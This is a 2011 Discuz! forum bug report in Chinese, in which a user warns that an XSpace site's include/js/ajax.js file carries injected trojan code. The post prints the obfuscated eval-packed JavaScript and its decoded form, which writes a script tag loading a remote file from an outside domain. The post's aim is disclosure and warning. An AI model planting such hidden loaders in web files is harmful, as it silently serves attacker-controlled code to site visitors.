Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[反馈BUG] Xsapce发现注入JS代码。

[复制链接]
cadf 发表于 2011-4-29 20:36:59 | 显示全部楼层 |阅读模式
<script>  Xspace安装网址/include/js/ajax.js" type="text/javascript" language="javascript"></script>      
这个JS代码引起的木马置入

http://Xspace安装网址/include/js/ajax.js  这个文件里有段加密了的代码               


eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b.a(\'<9 8="7://6.5.4/3/2.1"></0>\');',12,12,'script|js|cp|spcode|com|googleadsl|www|http|src|SCRIPT|write|document'.split('|'),0,{}))


     解密后是调用 <SCRIPT src="http://www.googleadsl.com/spcode/cp.js"></script>
      
yyaoking 发表于 2011-5-1 13:13:17 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-28 08:41 , Processed in 0.023451 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表